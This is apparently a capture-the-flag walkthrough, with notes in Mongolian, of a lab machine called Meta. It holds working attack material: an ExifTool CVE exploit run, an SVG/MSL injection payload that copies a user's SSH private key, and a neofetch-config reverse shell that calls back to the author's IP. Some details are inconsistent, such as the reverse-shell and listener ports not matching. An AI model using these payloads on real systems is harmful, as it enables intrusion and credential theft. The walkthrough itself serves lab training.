1. IP Address
# Machine Address
10.10.11.140
# Local Address
10.10.14.90
2. Nmap
nmap -sC -sV -oA nmap/meta 10.10.11.140
Result:
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-30 04:32 EST
Nmap scan report for 10.10.11.140
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
| 256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_ 256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://artcorp.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.09 seconds
/etc/hosts-д artcorp.htb нэмж оруулна.
3. Gobuster
gobuster dir -u http://artcorp.htb -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
Result:
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://artcorp.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/30 04:38:58 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 234] [--> http://artcorp.htb/assets/]
/css (Status: 301) [Size: 231] [--> http://artcorp.htb/css/]
V-host:
gobuster vhost -u http://artcorp.htb -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://artcorp.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/30 04:45:39 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev01.artcorp.htb (Status: 200) [Size: 247]
dev01.artcorp.htb -г etc/hosts дотор нэмлээ.
4. CVE-2021-22204
http://dev01.artcorp.htb/metaview/
зураг upload хийвэл:
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 275
Image Height : 183
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
exiftool - cve ашиглаж exploit хийж www руу хандах:
git clone https://github.com/convisolabs/CVE-2021-22204-exiftool
дотор байгаа exploit.py ip, port өөрийн хаягаар сольж бичээд python3 exploit.py ажилуулаад шинээр generate хийсэн image.jpg-г upload хийнэ. Өмнө нь nc -lvnp 9001 порт асаагаад listen хийнэ.
Shell balancing
python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z
stty raw -echo
f+g [enter enter]
буцаад nc орох үед:
export TERM=xterm
/etc/passwd:
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
bash-5.0$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
thomas нэртэй user байгаад харж болж байна.
5. Exploitation
pspy64s:
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
Web server асаах:
mkdir www
mv pspy64s www
python3 -m http.server
www:
cd /tmp
wget 10.10.14.90:8000/pspy64s
chmod +x pspy64s
./pspy64s
/usr/local/bin/convert_images.sh
2022/01/30 07:37:01 CMD: UID=1000 PID=26258 | /bin/bash /usr/local/bin/convert_images.sh
2022/01/30 07:37:01 CMD: UID=1000 PID=26259 | /usr/local/bin/mogrify -format png *.*
2022/01/30 07:37:01 CMD: UID=1000 PID=26260 | pkill mogrify
/use/local/bin/convet_images.sh:
#!/bin/bash
cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify
poc.svg:
/tmp дотор touch хийгээд save хийнэ.
<image authenticate='ff" `echo $(cat ~/.ssh/id_rsa)> /dev/shm/key`;"'>
<read filename="pdf:/etc/passwd"/>
<get width="base-width" height="base-height" />
<resize geometry="400x400" />
<write filename="test.png" />
<svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="msl:poc.svg" height="100" width="100"/>
</svg>
</image>
доор байгаа path руу хуулаад cron ажиллах хүртэл хүлээнэ.
cp /tmp/poc.svg /var/www/dev01.artcorp.htb/convert_images/
/dev/shm дотор key нэртэй id_rsa үүссэн байгаа. wget юм уу cat хийж байгаад id_rsa хуулаад форматад оруулаад
mv key id_rsa
chmod 600 id_rsa
ssh -i id_rsa thomas@10.10.11.140
user.txt:
1675c9*******
6. Enumeration
sudo -l
thomas-с хэрэглэж болох зүйл:
Matching Defaults entries for thomas on meta:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XDG_CONFIG_HOME
User thomas may run the following commands on meta:
(root) NOPASSWD: /usr/bin/neofetch \"\"
/usr/bin/neofetch:
_,met$$$$$gg. root@meta
,g$$$$$$$$$$$$$$$P. ---------
,g$$P" """Y$$.". OS: Debian GNU/Linux 10 (buster) x86_64
,$$P' `$$$. Host: VMware Virtual Platform None
',$$P ,ggs. `$$b: Kernel: 4.19.0-17-amd64
`d$$' ,$P"' . $$$ Uptime: 4 hours, 41 mins
$$P d$' , $$P Packages: 495 (dpkg)
$$: $$. - ,d$$' Shell: bash 5.0.3
$$; Y$b._ _,d$P' CPU: AMD EPYC 7302P 16- (2) @ 2.994GHz
Y$$. `.`"Y$$$$P"' GPU: VMware SVGA II Adapter
`$$b "-.__ Memory: 151MiB / 1994MiB
`Y$$
`Y$$.
`$$b.
`Y$$b.
`"Y$b._
`"""
/home/thomas/.config/neofetch:
vi config.conf
# add
bash &>/dev/tcp/10.10.14.90/9000 <&1
# 9001 порт сонсоно
nc -lvnp 9001
# machine vm
export XDG_CONFIG_HOME=/home/thomas/.config
root.txt:
f44aa****